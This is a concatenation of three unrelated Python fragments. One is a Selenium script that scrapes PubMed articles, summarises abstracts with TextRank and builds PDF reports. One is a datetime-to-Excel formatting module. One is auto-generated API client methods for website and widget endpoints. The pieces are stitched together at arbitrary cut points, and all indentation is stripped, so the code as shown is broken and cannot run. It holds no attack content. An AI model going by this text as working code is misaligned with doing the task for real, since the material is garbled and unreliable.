pathx = "/Users/uksu/Downloads/chromedriver"
browser = webdriver.Chrome(executable_path=pathx,options=chrome_opt)
ActionChains(browser).key_down(Keys.CONTROL).click().key_up(Keys.CONTROL).perform()
url = 'https://pubmed.ncbi.nlm.nih.gov/?term=' + quote(keywords.encode('utf-8')) + '&size=20'
browser.get(url)
time.sleep(1)
element = browser.find_element_by_tag_name("body")
# Searching environment setting
elementx = browser.find_element_by_xpath('//*[@id="static-filters-form"]/div/div[1]/div[1]/ul/li[1]/label')
browser.execute_script("arguments[0].click();", elementx)
time.sleep(1)
elementx = browser.find_element_by_xpath('//*[@id="static-filters-form"]/div/div[1]/div[1]/ul/li[2]/label')
browser.execute_script("arguments[0].click();", elementx)
time.sleep(1)
elementx = browser.find_element_by_xpath('//*[@id="static-filters-form"]/div/div[1]/div[1]/ul/li[3]/label')
browser.execute_script("arguments[0].click();", elementx)
time.sleep(1)
# click first article
elementx = browser.find_element_by_xpath('//*[@id="search-results"]/section/div[1]/div/article[1]/div[2]/div[1]/a')
browser.execute_script("arguments[0].click();", elementx)
first_article = browser.find_element_by_xpath('//*[@id="adjacent-navigation"]/div[2]/a/span[2]')
browser.execute_script("arguments[0].click();", first_article)
time.sleep(1)
first_article = browser.find_element_by_xpath('//*[@id="adjacent-navigation"]/div[2]/a/span[2]')
browser.execute_script("arguments[0].click();", first_article)
time.sleep(1)
## extract first article
# title_list
t_path = '//*[@id="full-view-heading"]/h1'
title_link = browser.find_element_by_xpath(t_path)
title_list_tmp = title_link.text
title_list.append(title_list_tmp)
# citation list
try:
c_path = '//*[@id="citedby"]/h2/em[1]'
citation_link = browser.find_element_by_xpath(c_path)
citation_list_tmp = citation_link.text
citation_list.append(citation_list_tmp)
except:
print("!! No citation of this paper !!")
citation_list_tmp = '0'
citation_list.append(citation_list_tmp)
# doi_list
try:
d_path = '//*[@id="full-view-identifiers"]/li[2]/span/a'
doi_link = browser.find_element_by_xpath(d_path)
doi_list_tmp = doi_link.get_attribute('href')
doi_list.append(doi_list_tmp)
except:
doi_list_tmp = "No DOI!!"
doi_list.append(doi_list_tmp)
## abstract_list
a_path = '//*[@id="enc-abstract"]/p'
abstract_link = browser.find_element_by_xpath(a_path)
abstract_list_tmp = abstract_link.text
abstract_list.append(abstract_list_tmp)
# abstract_summary
# load a spaCy model and set the environment
nlp = spacy.load("en_core_web_sm")
# logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
# logger = logging.getLogger("PyTR")
tr = pytextrank.TextRank(logger=None)
nlp.add_pipe(tr.PipelineComponent, name="textrank", last=True)
doc = nlp(abstract_list_tmp)
# temporary abstract_summary_list
abstract_summary_list_tmp = [];
for ab_summary in doc._.textrank.summary(limit_phrases=1, limit_sentences=2):
abstract_summary_list_tmp.append(ab_summary)
abstract_summary_list.append(str(abstract_summary_list_tmp))
# temporary abstract_summary_list
abstract_keyword_list_tmp = [];
for phrase in doc._.phrases[:5]: ## top 5 keywords
abstract_keyword_list_tmp.append(phrase)
abstract_keyword_list.append(str(abstract_keyword_list_tmp))
# figure_list
j = 1
while j < 10:
try:
f_path = '//*[@id="slides-container"]/figure['+ str(j) + ']/a'
figure_link = browser.find_element_by_xpath(f_path)
figure_list_tmp = figure_link.get_attribute('href')
figure_list.append(figure_list_tmp)
except:
print("!! No more figures in this paper !!")
figure_list.append('no_fig')
# figure_list.remove('no_fig')
j += 1
time.sleep(1)
# go to next article
next_article = browser.find_element_by_xpath('//*[@id="adjacent-navigation"]/div[2]/a/span[2]')
browser.execute_script("arguments[0].click();", next_article)
time.sleep(1)
except Exception as e:
print(e)
## main run
i = 0
while i < itemN - 1:
# title_list
t_path = '//*[@id="full-view-heading"]/h1'
title_link = browser.find_element_by_xpath(t_path)
title_list_tmp = title_link.text
title_list.append(title_list_tmp)
# citation list
try:
c_path = '//*[@id="citedby"]/h2/em[1]'
citation_link = browser.find_element_by_xpath(c_path)
citation_list_tmp = citation_link.text
citation_list.append(citation_list_tmp)
except:
print("!! No citation of this paper !!")
citation_list_tmp = '0'
citation_list.append(citation_list_tmp)
# doi_list
try:
d_path = '//*[@id="full-view-identifiers"]/li[2]/span/a'
doi_link = browser.find_element_by_xpath(d_path)
doi_list_tmp = doi_link.get_attribute('href')
doi_list.append(doi_list_tmp)
except:
doi_list_tmp = "No DOI!!"
doi_list.append(doi_list_tmp)
# abstract_list
a_path = '//*[@id="enc-abstract"]/p'
abstract_link = browser.find_element_by_xpath(a_path)
abstract_list_tmp = abstract_link.text
abstract_list.append(abstract_list_tmp)
# load a spaCy model and set the environment
nlp = spacy.load("en_core_web_sm")
# logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
# logger = logging.getLogger("PyTR")
tr = pytextrank.TextRank(logger=None)
nlp.add_pipe(tr.PipelineComponent, name="textrank", last=True)
doc = nlp(abstract_list_tmp)
# temporary abstract_summary_list
abstract_summary_list_tmp = [];
for ab_summary in doc._.textrank.summary(limit_phrases=1, limit_sentences=2):
abstract_summary_list_tmp.append(ab_summary)
abstract_summary_list.append(str(abstract_summary_list_tmp))
# temporary abstract_summary_list
abstract_keyword_list_tmp = [];
for phrase in doc._.phrases[:5]: ## top 5 keywords
abstract_keyword_list_tmp.append(phrase)
abstract_keyword_list.append(str(abstract_keyword_list_tmp))
# figure_list
j = 1
while j < 10:
try:
f_path = '//*[@id="slides-container"]/figure['+ str(j) + ']/a'
figure_link = browser.find_element_by_xpath(f_path)
figure_list_tmp = figure_link.get_attribute('href')
figure_list.append(figure_list_tmp)
except:
print("!! No more figures in this paper !!")
figure_list.append('no_fig')
# figure_list.remove('no_fig')
j += 1
# go to next article
try:
next_article = browser.find_element_by_xpath('//*[@id="adjacent-navigation"]/div[3]/a/span[2]')
browser.execute_script("arguments[0].click();", next_article)
time.sleep(0.5)
i += 1
except:
print("### End of the searching pages ###")
break
browser.quit()
return title_list, citation_list, doi_list, abstract_list, abstract_summary_list, abstract_keyword_list, figure_list
def create_dir(self, root_dir, name):
try:
if not os.path.exists(root_dir):
os.makedirs(root_dir)
time.sleep(0.2)
path = (name)
sub_directory = os.path.join(root_dir, path)
if not os.path.exists(sub_directory):
os.makedirs(sub_directory)
else:
path = (name)
sub_directory = os.path.join(root_dir, path)
if not os.path.exists(sub_directory):
os.makedirs(sub_directory)
except OSError as e:
if e.errno != 17:
raise
pass
return
# HELP Section
parser = argparse.ArgumentParser(description='## Search and Extract Papers using PubMed Engine ##', formatter_class=argparse.RawDescriptionHelpFormatter,
epilog='''\
version history:
[Ver 0.21] bug fixed for duplicated articles over limit
[ver 0.20] added an abstract summary as an output using TextRank algorithm
[ver 0.10] release of this script (2020.08.01)
++ Copyright at <EMAIL> / <EMAIL> ++
''')
# parser.add_argument("Keyword", help="Keywords without space",)
# parser.add_argument("Item_number", help="Searching item number")
# parser.add_argument("URL_output.txt", help="URL text files")
parser.add_argument('--version', action='version', version='Version 0.1')
parser.parse_args()
# assign input arguments
print("+++++++++++++++++++++++++++++++++++++++++++++")
keyword = input('## Enter the keywords: ')
print("+++++++++++++++++++++++++++++++++++++++++++++")
itemN = input('## How many articles do you want ?: ')
print("+++++++++++++++++++++++++++++++++++++++++++++")
# root directiory
root_dir = "PubMed_Reports/"
# MAIN RUN
response = pmExt
title_list, citation_list, doi_list, abstract_list, abstract_summary_list, abstract_keyword_list, figure_list = response().ext_article(keyword, int(itemN))
# set path
path = root_dir + keyword
# link downloads
print("")
print(" +++++++++++++++++++++++++++++++++++++ NOW Processing IS STARTING +++++++++++++++++++++++++++++++++++++ ")
print("")
print(" [ Now downloading article information !! ] ")
# with open(os.path.join('./' + root_dir + '/', keyword + '.txt'), 'w', encoding="utf-8") as f:
# pbar = enumerate(tqdm(title_list))
# for item_ind, item in pbar:
# f.write("%s\n" % " ")
# f.write("[ Article" + "-" + '%04d' %(item_ind + 1) + " ]: " + "%s\n" % item)
# f.write("Citation" + ": " + "%s\n" % textwrap.fill(citation_list[item_ind], width=150))
# f.write("doi" + ": " + "%s\n" % textwrap.fill(doi_list[item_ind], width=150))
# f.write("%s\n" % textwrap.fill(abstract_list[item_ind], width=150))
# f.write("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
# f.write("%s\n" % " ")
# time.sleep(0.01)
# set the template for pdf output
report = SimpleDocTemplate(os.path.join('./' + root_dir + '/' + "pmExt_ArticleReport-" + keyword + '.pdf'), pagesize=A4)
report_style = getSampleStyleSheet()
# report_style.list()
report_style.add(ParagraphStyle(name='Paragraph', spaceAfter=10))
report_style.add(ParagraphStyle(name='content_title',
fontFamily='Helvetica',
fontSize=12,
leading=15,
textColor=colors.HexColor("#2E2D30")))
report_style.add(ParagraphStyle(name='content_citation',
fontFamily='Helvetica',
fontSize=10,
textColor=colors.HexColor("#D65720")))
report_style.add(ParagraphStyle(name='content_doi',
fontFamily='Times-Roman',
fontSize=11,
leading=15,
textColor=colors.HexColor("#285DC9")))
report_style.add(ParagraphStyle(name='content_line',
fontFamily='Times-Roman',
fontSize=11,
leading=15,
textColor=colors.HexColor("#050000")))
report_style.add(ParagraphStyle(name='content_summary',
fontFamily='Times-Roman',
fontSize=11,
leading=15,
textColor=colors.HexColor("#1A6304")))
report_style.add(ParagraphStyle(name='content_keyword',
fontFamily='Times-Roman',
fontSize=11,
leading=15,
textColor=colors.HexColor("#A10613")))
# title
report_title = Paragraph("pmExt Reports <ver 0.22>", report_style['Heading1'])
# main run
pbar = enumerate(tqdm(title_list))
contents = []
contents.append(report_title)
# run loop
for item_ind, item in pbar:
# article number
paragraph_1 = Paragraph(
("[ Article" + "-" + '%04d' %(item_ind + 1) + " ]"),
report_style['Heading2']
)
# title
paragraph_2= Paragraph(
item,
report_style['content_title']
)
# citation number
paragraph_3 = Paragraph(
("Citation: " + "%s\n" % citation_list[item_ind]),
report_style['content_citation']
)
# doi link
paragraph_4 = Paragraph(
("DOI: " + "%s\n" % doi_list[item_ind]),
report_style['content_doi']
)
# abstract
paragraph_5 = Paragraph(
abstract_list[item_ind],
report_style['BodyText']
)
contents.append(paragraph_1)
contents.append(paragraph_2)
contents.append(paragraph_3)
contents.append(paragraph_4)
contents.append(paragraph_5)
report.build(contents)
print(" ")
print(" [ Now downloading abstract summary !! ] ")
# with open(os.path.join('./' + root_dir + '/', keyword + '_abstract_summary' + '.txt'), 'w', encoding="utf-8") as f:
# pbar = enumerate(tqdm(title_list))
# for item_ind, item in pbar:
# f.write("%s\n" % " ")
# f.write("[ Article" + "-" + '%04d' %(item_ind + 1) + " ]: " + "%s\n" % item)
# f.write("Citation" + ": " + "%s\n" % textwrap.fill(citation_list[item_ind], width=150))
# f.write("doi" + ": " + "%s\n" % textwrap.fill(doi_list[item_ind], width=150))
# f.write("%s\n" % " ")
# f.write("%s\n" % textwrap.fill(abstract_summary_list[item_ind], width=150))
# f.write("%s\n" % " ")
# f.write('# Keywords ' + "%s\n" % textwrap.fill(abstract_keyword_list[item_ind]))
# f.write("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
# f.write("%s\n" % " ")
# time.sleep(0.01)
#
# set the template for pdf output
summary = SimpleDocTemplate(os.path.join('./' + root_dir + '/' + "pmExt_AbstractSummary-" + keyword + '.pdf'), pagesize=A4)
# title
summary_title = Paragraph("pmExt Reports (Abstract Summary)", report_style['Heading1'])
# main run
pbar = enumerate(tqdm(title_list))
contents_sum = []
contents_sum.append(summary_title)
# run loop
for item_ind, item in pbar:
# article number
paragraph_1 = Paragraph(
("[ Article" + "-" + '%04d' %(item_ind + 1) + " ]"),
report_style['Heading2']
)
# title
paragraph_2= Paragraph(
item,
report_style['content_title']
)
# citation number
paragraph_3 = Paragraph(
("Citation: " + "%s\n" % citation_list[item_ind]),
report_style['content_citation']
)
# doi link
paragraph_4 = Paragraph(
("DOI: " + "%s\n" % doi_list[item_ind]),
report_style['content_doi']
)
# abstract summary
paragraph_5 = Paragraph(
"+++++++++++++++++++++++++++ Auto-Summary ++++++++++++++++++++++++++++",
report_style['content_line']
)
# abstract summary
paragraph_6 = Paragraph(
abstract_summary_list[item_ind],
report_style['content_summary']
)
# abstract summary
paragraph_7 = Paragraph(
"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",
report_style['content_line']
)
# abstract keywords
paragraph_8 = Paragraph(
abstract_keyword_list[item_ind],
report_style['content_keyword']
)
contents_sum.append(paragraph_1)
contents_sum.append(paragraph_2)
contents_sum.append(paragraph_3)
contents_sum.append(paragraph_4)
contents_sum.append(paragraph_5)
contents_sum.append(paragraph_6)
contents_sum.append(paragraph_7)
contents_sum.append(paragraph_8)
summary.build(contents_sum)
# save figures
print(" ")
print(" [ Now downloading article figures !! ] ")
pbar2 = enumerate(tqdm(figure_list))
indN = len(title_list) + 1
n_tmp = 0
ind2_tmp = 1
fig_mark = 0
nofig_mark = 0
for item_ind2, item2 in pbar2:
if 'no_fig' not in item2:
filename = "Article" + "_" + '%04d' % (n_tmp + 1) + "_Fig" + '%02d' % (ind2_tmp) + ".jpg"
urllib.request.urlretrieve(item2, os.path.join(path, filename))
fig_mark += 1
else:
nofig_mark += 1
ind2_tmp = 0
mark_diff = item_ind2 - (nofig_mark+fig_mark)
ind2_tmp = ind2_tmp + 1
n_tmp = round((item_ind2 - ind2_tmp + 1 - mark_diff)/9)
print("")
print(" +++++++++++++++++++++++++++++++++++++ NOW EXTRACTION FINISHED ++++++++++++++++++++++++++++++++++++++++ | |
import datetime as dt_module
from dynamicmethod import dynamicmethod
from collections import OrderedDict
__all__ = ['datetime', 'date', 'time',
'make_datetime', 'str_datetime',
'DATETIME_FORMATS', 'TIME_FORMATS', 'DATETIME_FORMATS']
DATE_FORMATS = [
'%m/%d/%Y', '%Y-%m-%d', '%y-%m-%d', '%m/%d/%y', # '2019-04-17', '04/17/2019'
'%b %d %Y', '%b %d, %Y', # 'Apr 17 2019', 'Apr 17, 2019'
'%d %b %Y', '%d %b, %Y', # '17 Apr 2019', '17 Apr, 2019'
'%B %d %Y', '%B %d, %Y', # 'April 17 2019', 'April 17, 2019'
'%d %B %Y', '%d %B, %Y', # '17 April 2019', '17 April, 2019'
]
TIME_FORMATS = [
'%H:%M:%S', # '14:24:55'
'%I:%M:%S %p', # '02:24:55 PM'
'%I:%M:%S.%f %p', # '02:24:55.000200 PM'
'%I:%M %p', # '02:24 PM'
'%H:%M:%S.%f', # '14:24:55.000200'
'%H:%M', # '14:24'
'%H:%M:%S+00:00', # '14:24:55+00:00'
]
DATETIME_FORMATS = [d + ' ' + t for t in TIME_FORMATS for d in DATE_FORMATS] + DATE_FORMATS + TIME_FORMATS
DATETIME_FORMAT_TO_EXCEL = OrderedDict([
('%a', 'ddd'), ('%A', 'dddd'), ('%w', 'ddd'), ('%d', 'dd'),
('%b', 'mmm'), ('%B', 'mmmm'), ('%m', 'mm'),
('%y', 'yy'), ('%Y', 'yyyy'),
('%H', 'hh'), ('%I', 'h'), ('%p', 'AM/PM'),
('%M', 'mm'),
('%S', 'ss'),
('%f', '00'),
('%z', ''), ('%Z', ''), ('%j', ''), ('%U', ''), ('%W', ''),
('%c', 'ddd mmm dd hh:mm:ss yyyy'),
('%x', 'mm/dd/yyyy'),
('%X', 'hh:mm:ss'),
('%%', '%'),
])
def make_datetime(dt_string, formats=None):
"""Make the datetime from the given date time string.
Args:
dt_string (str): Datetime string '04:00 PM' ...
formats (list)[None]: List of acceptable datetime string formats.
Returns:
dt (datetime.datetime): Datetime object or None.
"""
if not isinstance(dt_string, str):
return dt_string
if formats is None:
formats = DATETIME_FORMATS
for fmt in formats:
try:
return dt_module.datetime.strptime(dt_string, fmt)
except (TypeError, ValueError, Exception):
pass
try: # Try ISO format
return dt_module.datetime.fromisoformat(dt_string)
except (TypeError, ValueError, AttributeError, Exception):
pass
raise ValueError('Invalid datetime format {}. Allowed formats are {}'.format(repr(dt_string), repr(formats)))
def str_datetime(dt, formats=None):
"""Return the datetime as a string."""
if isinstance(dt, str):
return dt
if isinstance(formats, str):
return dt.strftime(formats)
if formats is None:
formats = DATETIME_FORMATS
return dt.strftime(formats[0])
def datetime_fmt_to_excel(fmt):
for k, v in DATETIME_FORMAT_TO_EXCEL.items():
fmt = fmt.replace(k, v)
return fmt
DEFAULT_DT = dt_module.datetime.utcfromtimestamp(0)
class DtMixin(object):
str_format = DATETIME_FORMATS[0]
formats = DATETIME_FORMATS
DEFAULT_PARAMS = OrderedDict([('year', DEFAULT_DT.year), ('month', DEFAULT_DT.month), ('day', DEFAULT_DT.day),
('hour', DEFAULT_DT.hour), ('minute', DEFAULT_DT.minute),
('second', DEFAULT_DT.second), ('microsecond', DEFAULT_DT.microsecond),
('tzinfo', DEFAULT_DT.tzinfo), ('fold', DEFAULT_DT.fold)])
def __init__(self, dt=None, *args, str_format=None, formats=None, **kwargs):
super().__init__() # Object init
@classmethod
def get_params(cls, defaults, dt, args, kwargs, formats=None):
"""Return a list of keyword arguments for the given positional, keyword and default values.
Args:
defaults (OrderedDict): Ordered dict of key word names with default values. None value means optional.
dt (object/int)[None]: Object datetime, date, time or integer year or hour is assumed.
args (tuple): Positional arguments
kwargs (dict): Key word arguments
formats (list)[None]: List of acceptable datetime string formats.
Returns:
params (dict): Dictionary of mapped name arguments.
"""
defaults = defaults.copy()
params = {}
# If datetime get the values as default values (override with kwargs for duplicate values)
if isinstance(dt, str):
dt = make_datetime(dt, formats or cls.formats)
elif isinstance(dt, (int, float)) and len(args) + len(kwargs) < 2:
dt = dt_module.datetime.utcfromtimestamp(dt)
elif isinstance(dt, (int, float)):
# Assume integer is positional argument year or hour.
args = (dt,) + args
dt = None
# Get datetime attributes
if isinstance(dt, (dt_module.datetime, dt_module.date, dt_module.time)):
for name in defaults:
value = getattr(dt, name, None)
if value is not None:
defaults[name] = value
# Find positional values and keyword values
arg_len = len(args)
for i, name in enumerate(defaults.keys()):
if i < arg_len:
params[name] = args[i]
else:
value = kwargs.get(name, defaults.get(name, None))
if value is not None:
params[name] = value
return params
@classmethod
def get_init_formats(cls, str_format=None, formats=None):
"""Get the str_format and formats from the initial args."""
if formats is None:
formats = cls.formats
if str_format is None:
str_format = cls.str_format
if isinstance(str_format, (list, tuple)):
formats = str_format
str_format = str_format[0]
elif str_format is None:
str_format = formats[0]
return str_format, formats
@dynamicmethod # Run as a classmethod or instancemethod
def decode(self, item):
# Get the class object
cls = self
if isinstance(self, (dt_module.datetime, dt_module.date, dt_module.time)):
cls = self.__class__
# Get the item value
try:
value = item.Value
if isinstance(value, (int, float)) and value < 1:
# Convert excel hours to seconds? 86400 seconds == 24 hr? Only gets here from time value.
value = value * 86400
except (ValueError, TypeError, AttributeError, Exception):
value = item
# Convert the value to a datetime object
if not isinstance(value, cls):
value = cls(value, str_format=self.str_format, formats=self.formats)
return value
@dynamicmethod # Run as a classmethod or instancemethod
def encode(self, item, value):
# Get the class object
cls = self
if isinstance(self, (dt_module.datetime, dt_module.date, dt_module.time)):
cls = self.__class__
# Convert to this object type
if not isinstance(value, datetime):
value = cls(dt=value, str_format=self.str_format, formats=self.formats)
item.NumberFormat = datetime_fmt_to_excel(self.str_format or self.formats[0])
item.Value = str(value)
def __str__(self):
return str_datetime(self, self.str_format or self.formats)
class datetime(dt_module.datetime, DtMixin):
formats = DATETIME_FORMATS
str_format = DATETIME_FORMATS[0]
DEFAULT_PARAMS = OrderedDict([('year', DEFAULT_DT.year), ('month', DEFAULT_DT.month), ('day', DEFAULT_DT.day),
('hour', DEFAULT_DT.hour), ('minute', DEFAULT_DT.minute),
('second', DEFAULT_DT.second), ('microsecond', DEFAULT_DT.microsecond),
('tzinfo', DEFAULT_DT.tzinfo), ('fold', DEFAULT_DT.fold)])
def __new__(cls, dt=None, *args, str_format=None, formats=None, **kwargs):
"""Create the datetime object.
Args:
dt (int/float/str/datetime): Datetime, str datetime, timestamp, or year positional argument.
*args (tuple): Positional datetime arguments.
str_format (str)[None]: String format to convert the object to a string with.
formats (list)[None]: List of string formats to parse and decode information with.
**kwargs (dict): Dictionary of datetime keyword arguments.
"""
# Get the parameters and their defaults
params = cls.get_params(cls.DEFAULT_PARAMS, dt, args, kwargs, formats)
# Create this object type
dt = super().__new__(cls, **params)
dt.str_format, dt.formats = dt.get_init_formats(str_format, formats)
return dt # Return will run __init__
def __init__(self, dt=None, *args, str_format=None, formats=None, **kwargs):
"""Initialize the datetime object.
Args:
dt (int/float/str/datetime): Datetime, str datetime, timestamp, or year positional argument.
*args (tuple): Positional datetime arguments.
str_format (str)[None]: String format to convert the object to a string with.
formats (list)[None]: List of string formats to parse and decode information with.
**kwargs (dict): Dictionary of datetime keyword arguments.
"""
super().__init__()
def __str__(self):
return str_datetime(self, self.str_format or self.formats)
class date(datetime): # (dt_module.date, DtMixin): # excel cannot use date use datetime with different format.
formats = DATETIME_FORMATS
str_format = DATE_FORMATS[0]
DEFAULT_PARAMS = OrderedDict([('year', DEFAULT_DT.year), ('month', DEFAULT_DT.month), ('day', DEFAULT_DT.day)])
def __new__(cls, dt=None, *args, str_format=None, formats=None, **kwargs):
"""Create the date object.
Args:
dt (int/float/str/datetime): date, str date, timestamp, or year positional argument.
*args (tuple): Positional date arguments.
str_format (str)[None]: String format to convert the object to a string with.
formats (list)[None]: List of string formats to parse and decode information with.
**kwargs (dict): Dictionary of date keyword arguments.
"""
# Get the parameters and their defaults
params = cls.get_params(cls.DEFAULT_PARAMS, dt, args, kwargs)
# Create this object type
dt = super().__new__(cls, **params)
dt.str_format, dt.formats = dt.get_init_formats(str_format, formats)
return dt # Return will run __init__
def __init__(self, dt=None, *args, str_format=None, formats=None, **kwargs):
"""Initialize the date object.
Args:
dt (int/float/str/datetime): date, str date, timestamp, or year positional argument.
*args (tuple): Positional date arguments.
str_format (str)[None]: String format to convert the object to a string with.
formats (list)[None]: List of string formats to parse and decode information with.
**kwargs (dict): Dictionary of date keyword arguments.
"""
super().__init__()
def __str__(self):
return str_datetime(self, self.str_format or self.formats)
class time(dt_module.time, DtMixin):
formats = TIME_FORMATS
str_format = TIME_FORMATS[0]
DEFAULT_PARAMS = OrderedDict([('hour', DEFAULT_DT.hour), ('minute', DEFAULT_DT.minute),
('second', DEFAULT_DT.second), ('microsecond', DEFAULT_DT.microsecond)])
def __new__(cls, dt=None, *args, str_format=None, formats=None, **kwargs):
"""Create the time object.
Args:
dt (int/float/str/datetime): time, str time, timestamp, or hour positional argument.
*args (tuple): Positional time arguments.
str_format (str)[None]: String format to convert the object to a string with.
formats (list)[None]: List of string formats to parse and decode information with.
**kwargs (dict): Dictionary of time keyword arguments.
"""
# Get the parameters and their defaults
params = cls.get_params(cls.DEFAULT_PARAMS, dt, args, kwargs)
# Create this object type
dt = super().__new__(cls, **params)
dt.str_format, dt.formats = dt.get_init_formats(str_format, formats)
return dt # Return will run __init__
def __init__(self, dt=None, *args, str_format=None, formats=None, **kwargs):
"""Initialize the time object.
Args:
dt (int/float/str/datetime): time, str time, timestamp, or hour positional argument.
*args (tuple): Positional time arguments.
str_format (str)[None]: String format to convert the object to a string with.
formats | |
# noqa: E501
return self.api_client.call_api(
'/website/websites', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebsitePaginationResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_website_property_list_by_website_id(self, id, **kwargs): # noqa: E501
"""get a list of properties for a website # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_website_property_list_by_website_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param str fields:
:param int size:
:param int offset:
:param str filter:
:return: PropertyPaginationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_website_property_list_by_website_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_website_property_list_by_website_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_website_property_list_by_website_id_with_http_info(self, id, **kwargs): # noqa: E501
"""get a list of properties for a website # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_website_property_list_by_website_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param str fields:
:param int size:
:param int offset:
:param str filter:
:return: PropertyPaginationResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fields', 'size', 'offset', 'filter'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_website_property_list_by_website_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_website_property_list_by_website_id`") # noqa: E501
if 'id' in params and not re.search('\d+', params['id'] if type(params['id']) is str else str(params['id'])): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `get_website_property_list_by_website_id`, must conform to the pattern `/\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/website/websites/{id}/properties', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PropertyPaginationResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_website_sdt_list_by_website_id(self, id, **kwargs): # noqa: E501
"""get a list of SDTs for a website # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_website_sdt_list_by_website_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param str fields:
:param int size:
:param int offset:
:param str filter:
:return: SDTPaginationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_website_sdt_list_by_website_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_website_sdt_list_by_website_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_website_sdt_list_by_website_id_with_http_info(self, id, **kwargs): # noqa: E501
"""get a list of SDTs for a website # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_website_sdt_list_by_website_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param str fields:
:param int size:
:param int offset:
:param str filter:
:return: SDTPaginationResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fields', 'size', 'offset', 'filter'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_website_sdt_list_by_website_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_website_sdt_list_by_website_id`") # noqa: E501
if 'id' in params and not re.search('\d+', params['id'] if type(params['id']) is str else str(params['id'])): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `get_website_sdt_list_by_website_id`, must conform to the pattern `/\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/website/websites/{id}/sdts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SDTPaginationResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_widget_by_id(self, id, **kwargs): # noqa: E501
"""get widget by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_widget_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param str fields:
:return: Widget
If the method is called asynchronously,
